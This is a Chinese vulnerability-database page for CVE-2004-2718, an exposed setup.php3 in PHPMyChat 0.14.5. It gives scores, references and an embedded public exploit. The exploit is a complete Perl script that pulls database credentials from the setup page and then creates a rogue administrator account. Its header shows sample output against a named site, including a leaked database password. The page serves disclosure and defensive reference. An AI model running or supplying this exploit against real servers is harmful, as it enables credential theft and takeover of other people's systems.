CVE-2004-2718
CVSS4.3
发布时间 :2004-12-31 00:00:00
修订时间 :2008-09-05 16:44:55
NMCOE    

[原文]PHPMyChat 0.14.5 does not remove or protect setup.php3 after installation, which allows attackers to obtain sensitive information including database passwords via a direct request.


[CNNVD]@PHP PHP Heaven PHPMyChat 权限许可和访问控制漏洞(CNNVD-200412-833)

        安装PHPMyChat 0.14.5版本安装后不能删除或保护setup.php3。攻击者可以借助直接请求获得包括数据库密码的敏感信息。

- CVSS (基础分值)

CVSS分值: 4.3 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: MEDIUM [漏洞利用存在一定的访问条件]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-264 [权限、特权与访问控制]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2718
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-2718
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200412-833
(官方数据源) CNNVD

- 其它链接及资源

http://www.securiteam.com/unixfocus/6D00S0KC0S.html
(UNKNOWN)  MISC  http://www.securiteam.com/unixfocus/6D00S0KC0S.html
http://secunia.com/advisories/11894
(VENDOR_ADVISORY)  SECUNIA  11894

- 漏洞信息

@PHP PHP Heaven PHPMyChat 权限许可和访问控制漏洞
中危 权限许可和访问控制
2004-12-31 00:00:00 2007-10-10 00:00:00
远程  
        安装PHPMyChat 0.14.5版本安装后不能删除或保护setup.php3。攻击者可以借助直接请求获得包括数据库密码的敏感信息。

- 公告与补丁

        

- 漏洞信息 (703)

phpMyChat 0.14.5 Remote Improper File Permissions Exploit (EDBID:703)
php webapps
2004-12-22 Verified
0 sysbug
N/A [点击下载]
####################################################################
#
#  _____ _
# |  ___| | _____      ___
# | |_  | |/ _ \ \ /\ / /
# |  _| | | (_) \ V  V /
# |_|   |_|\___/ \_/\_/
#      Security Group.
#
#                    * phpMyChat remote sploit *                           
#                           by sysbug
#
# C:\Perl\bin>perl pmc.pl www.kublooddrive.com /chat
# /* Mysql dump :
# * C_DB_HOST : localhost
# * C_DB_NAME : jhawk_pchat1
# * C_DB_USER : jhawk_pchat1
# * C_DB_PASS : vvejTjeLgB
# *
# * Adding Admin ....
# * login:jhawk
# * pwd:owned
# */
# C:\Perl\bin>
# 
# Credits: all my friends!

use IO::Socket;

if(@ARGV < 2){
usage();
}
main();
sub sock(){
$ock=IO::Socket::INET->new(PeerAddr=>$host,PeerPort=>80,Proto=>'tcp',Timeout=>10)|| die " * s0ck null -\n";
print $ock "$path\r\n";
print $ock "Accept: */*\r\n";
print $ock "Accept-Language: pt\r\n";
print $ock "Accept-Encoding: gzip, deflate\r\n";
print $ock "User-Agent: l33t br0ws3r\r\n";
print $ock "Host: $host\r\n";
print $ock "Connection: Keep-Alive\r\n\r\n\r\n";
$path = '';
}
sub main(){
print "/*\n";
print " * sploit remote phpMychat\n";
print " *        by sysbug\n";
print " *\n";
$host = $ARGV[0];
$folder = $ARGV[1];
$path = "GET $folder/chat/setup.php3?next=1 HTTP/1.1";
sock();
$result =1;
while($recv = <$ock>){
if($recv =~ /(C_DB_PASS|C_DB_USER|C_DB_NAME|C_DB_HOST)(.*)(VALUE=)(")(.*)(">)/){
$c++;
print " * Mysql dump :\n" if($result);
print " * $1 : $5\n";
$mysql[$c] = $5;
$result = '';
}
else{
print " * sploit failed! \n";
print " *\\ \n";
exit;
}
}
close($ock);
$path = "GET $folder/chat/setup.php3?next=2&Form_Send=2&C_DB_TYPE=mysql&C_DB_HOST=$mysql[1]&C_DB_NAME=$mysql[2]&C_DB_USER=$mysql[3]&C_DB_PASS=$mysql[4]&C_MSG_TBL=messages&C_REG_TBL=reg_users&C_USR_TBL=users&C_BAN_TBL=ban_users&C_MSG_DEL=96&C_USR_DEL=4&C_REG_DEL=0&C_PUB_CHAT_ROOMS=Blood+Talk&C_PRIV_CHAT_ROOMS=&C_MULTI_LANG=1&C_LANGUAGE=english&C_REQUIRE_REGISTER=1&C_SHOW_ADMIN=1&C_SHOW_DEL_PROF=1&C_VERSION=1&C_BANISH=1&C_NO_SWEAR=1&C_SAVE=*&C_USE_SMILIES=1&C_HTML_TAGS_KEEP=simple&C_HTML_TAGS_SHOW=1&C_TMZ_OFFSET=0&C_MSG_ORDER=0&C_MSG_NB=20&C_MSG_REFRESH=10&C_SHOW_TIMESTAMP=1&C_NOTIFY=1&C_WELCOME=1 HTTP/1.1";
sock();
while($recv = <$ock>){
if($recv =~ /(ADM_LOG)(.*)(VALUE=)(")(.*)(">)/){
$c++;
$mysql[$c] = $5;
}
}
close($ock);
$pwd="owned";
$path = "GET $folder/chat/setup.php3?next=2&C_DB_TYPE=mysql&C_DB_HOST=$mysql[1]&C_DB_NAME=$mysql[2]&C_DB_USER=$mysql[3]&C_DB_PASS=$mysql[4]&C_MSG_TBL=messages&C_REG_TBL=reg_users&C_USR_TBL=users&C_BAN_TBL=ban_users&C_MSG_DEL=96&C_USR_DEL=4&C_REG_DEL=0&C_PUB_CHAT_ROOMS=Blood+Talk&C_PRIV_CHAT_ROOMS=&C_MULTI_LANG=1&C_LANGUAGE=english&C_REQUIRE_REGISTER=1&C_SHOW_ADMIN=1&C_SHOW_DEL_PROF=1&C_VERSION=1&C_BANISH=1&C_NO_SWEAR=1&C_SAVE=*&C_USE_SMILIES=1&C_HTML_TAGS_KEEP=simple&C_HTML_TAGS_SHOW=1&C_TMZ_OFFSET=0&C_MSG_ORDER=0&C_MSG_NB=20&C_MSG_REFRESH=10&C_SHOW_TIMESTAMP=1&C_NOTIFY=1&C_WELCOME=1&ADM_LOG=$mysql[5]&ADM_PASS=$pwd&Form_Send=3&Exist_Adm=1 HTTP/1.1";
sock();
if($mysql[5]){
print " *\n * Adding Admin ....\n * login:$mysql[5]\n * pwd:$pwd \n *\\ \n";
}
else{
print " * sploit failed! \n";
print " *\\ \n";
}
close($ock);
}
sub usage(){
print "/*\n";
print " * sploit remote phpMychat\n";
print " *        by sysbug\n";
print " * usage: perl $0 xpl.pl <host>\n";
print " * example: perl $0 xpl.pl www.site.com\n";
print " *          perl $0 xpl.pl www.site.com /chat\n";
print " */\n";
exit;
}

# milw0rm.com [2004-12-22]
		

- 漏洞信息

44922
PHPMyChat setup.php3 Direct Request Remote Information Disclosure
Remote / Network Access Information Disclosure
Loss of Confidentiality
Exploit Public

- 漏洞描述

- 时间线

2004-12-22 Unknow
2004-12-22 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站